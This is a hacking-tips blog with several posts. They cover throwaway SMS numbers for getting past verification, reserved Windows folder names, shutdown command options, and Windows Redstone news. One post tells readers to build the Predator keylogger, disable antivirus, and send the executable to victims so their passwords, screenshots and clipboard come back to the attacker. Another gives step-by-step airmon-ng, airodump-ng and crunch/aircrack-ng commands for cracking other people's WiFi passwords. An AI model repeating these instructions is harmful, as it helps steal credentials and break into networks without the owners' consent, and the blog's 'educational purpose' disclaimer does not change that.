Wednesday, January 18, 2017

Saturday, July 16, 2016

How To Bypass SMS Verification Of Any Website/Service


There are many free SMS receive services available online. Some of them are given below:

  • http://receivesmsonline.in
  • http://hs3x.com
  • http://sms-receive.net
  • http://www.receive-sms-now.com
  • http://www.receivesmsonline.net
  • http://receive-sms-online.com
  • http://receive-sms.com
  • http://receivesmsonline.com
  • http://receivefreesms.net
  • http://receive-a-sms.com
  • https://www.textmagic.com/free-tools/receive-free-sms-online
  • http://hs3x.com
  • http://receivesmsonline.in
  • http://www.receive-sms-now.com
  • http://receivefreesms.net
  • http://receivesmsonline.com
  • https://www.receivesmsonline.net
  • http://freesmsverification.com
  • http://receive-sms.com
  • https://smsreceivefree.com
  • http://www.e-receivesms.com
  • http://sms.sellaite.com
  • http://freereceivesmsonline.com
  • http://receiveonlinesms.biz
  • http://receivesmsonline.eu
  • http://getsms.org
  • http://receive-sms-online.com
  • http://receivefreesms.com
  • https://sms-online.co
  • http://mfreesms.com/receivesms.php
  • http://www.esendex.com.au/send-sms-online
  • http://www.textlocal.com/receiving-text-messages-online
  • https://www.proovl.com/numbers
  • http://receivesmsverification.com
  • http://receivesmsonline.me
  • http://www.virtty.com/en
You Can Use any of Them To Receive MSG and To Verify. We Take An Example of  http://www.receive-sms-now.com/

goto URL and Choose any Number as Shown in image.and put that Number To Make a Private Account.

Now You Will See Live Messages Received on that Number.

Monday, February 8, 2016

How To Make/Delete an Undelete-able,Unrename-able Folder

In Windows OS Nobody can Direct Create Folders by Name CON, lpt1, lpt2, lpt3, lpt4, lpt5, lpt6, lpt7, lpt8, lpt9 , COM1,, COM2, COM3, COM4, COM5, COM6, COM7, COM8, COM9 PRN, AUX, NUL




But There is a Way to Create Folder with the Name of All Those described above
Just open Command Prompt(CMD) 

Enter Below Code To Make Con Folder in c:

mkdir c:\con\

To Remove Directory Simply Type Code


rmdir c:\con\

or

rmdir c:\con\ /s /q

Definition:

mkdir is Command String to Make a Directory
c:\con\ is Directory Which Would be Created.
You Can Also Change con with lpt1,...lpt9 , COM1.... COM9 PRN, AUX, NUL
example: mkdir c:\AUX\
rmdir is also a Command String to delete\remove a Directory.

Keep Browsing H2Five ...

Saturday, January 16, 2016

Shutdown Commands for CMD (Windows)

Usage: shutdown [-i | -l | -s | -r | -a] [-f] [-m \\computername] [-t xx] [-c "comment"] [-d up:xx:yy]



        No args                 Display this message (same as -?)
        -i                      Display GUI interface, must be the first option
        -l                      Log off (cannot be used with -m option)
        -s                      Shutdown the computer
        -r                      Shutdown and restart the computer
        -a                      Abort a system shutdown
        -m \\computername       Remote computer to shutdown/restart/abort
        -t xx                   Set timeout for shutdown to xx seconds
        -c "comment"            Shutdown comment (maximum of 127 characters)
        -f                      Forces running applications to close without warning
        -d [u][p]:xx:yy         The reason code for the shutdown
                                u is the user code
                                p is a planned shutdown code
                                xx is the major reason code (positive integer less than 256)
                                yy is the minor reason code (positive integer less than 65536)

Monday, December 14, 2015

How To Hack Password Facebook,Gmail,MSN any Using Predator

Predator is a Key Logger Which can collects information From the Victom's PC and Send It To the Hackers.

Predator is a Powerful Key-Logger and With Much Interested Options and Commands. You can Build a System exe and Send it to Some one to Hack Accounts. When The user open it ,it automatically executes in system drive and start its work.

You Can Use Ftp Server, Php online Page and Also Your Email Address To Receive Emails With All Information include all types of  Username and Password , Screen Shots ,Clipboard .


















How TO : 


  • First of All Disable Your Antivirus.(antivirus , anti spyware Security Updates)
  • Extract Zip. and Open Predator v13 RUN THIS.exe
  • Select PHP, FTP or Email To Receive Information and enter Your Information here(Screenshot 1)
  • In Settings tab Choose Your Options To Attack Victoms PC(Screenshot 2)
  • Last Tab Build is to Create an executeable App.(Screenshot 3)
  • Now Send This To Your Friends and Tell Them That You Have Hacked Their Accounts And They Would be Impressed. :)
(Note: This Information is Educational Purpose only and Please Not to use to harm anybody) 





Screenshot 1 :



Screenshot 2 :



Screenshot 3 :



How To Cure From Predator :

To Vaccination of a System You need to Just Click on Cure in top Header of Predator 13.



Download Links : Predator 13

How To Hack WiFi Password Using Linux ?

How to hack WiFi password in Linux :

Well you can hack any wifi near you if you are using Linux specially Kali Linux.Many people use dictionary attacks but we are going to discuss a new and much powerful attack known as crunch.

As every one uses passwords of length 8-12 digits and in most cases it is numeric(0-9) or (a-z) or (A-Z).
When every method of hacking wifi fails this method comes in action.As it checks all possible combinations of the words which you type.

Step 1 :open terminal
Step 2 :type ifconfig.
Step 3 :type airmon-ng start wlan0  (zero not o)
Step 4 :now you get mon0 or mon1 at the end of command after performing step2.Note this name as we will use it in next steps
Step 5 :airodump-ng mon0(as i have monitoring mode enabled at mon0)
Step 6 :airodump-ng mon0 --bssid [bssid of network you want to hack] --channel [its CH no] --write yourfilename
when you see a handshake has been developed now its time to crack it.press cntrl+c to stop picking packets.Now try to find password by using crunch command.

crunch 8 12 0123456789 | aircrack-ng --bssid ag:ad:ff:33:22:11 -w- yourfilename.cap

8 means minimum 8 characters
12 means max 12 chars of password
0-9 means only check for numeric pass you can use abc...zABC....Z to check for all possible combinations .
like
crunch 8 12 abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 | aircrack-ng --bssid ag:ad:ff:33:22:11 -w- yourfilename.cap

Now sit back and wait as this method takes lot of time but it will crack any password of the world.

Microsoft Will Soon Introduce an OS For Mobile named As REDSTONE

An internal build of Windows 10 Mobile's next major update, Redstone, has been spotted on Buildfeed and it could be headed to Windows Insiders in the near future.




It hasn't been long since Microsoft delivered the first major update for Windows 10 and Windows 10 Mobile but the company is already busy developing the OS' next update which is expected to roll out next year. According to Buildfeed, the latest Windows 10 Mobile build from the Redstone branch that is being used internally, is 10.0.11082.1000.rs1_release.151210-2021.

Microsoft is currently planning to push regular monthly updates to Windows 10 in the meantime, and the company has already revealed its "Windows as a service" plans that accompany this. Windows 10 will ship this summer, but Microsoft will continue to update it and components that aren’t core to the operating system on a regular basis. As part of those plans, elements like Project Spartan, Microsoft’s new browser for Windows 10, will be updated through the Windows Store to ensure features can make their way to users at a more rapid pace. Microsoft moved a lot of the core features of Windows Phone to this model last year, and it’s something the company is increasingly doing across Windows as a whole.
The Windows Redstone updates won’t be seen as a Windows 11 or Windows 12, but more of a Windows 10.1, with new features added to the core for all difference device types to take advantage of. Microsoft is currently planning to detail more of its HoloLens and Windows 10 development plans at Build later this month, and it’s possible the company may discuss Windows as a service and Redstone. We understand the Redstone name was first used around two months ago inside Microsoft, so it may still be a little early for the company to share its plans.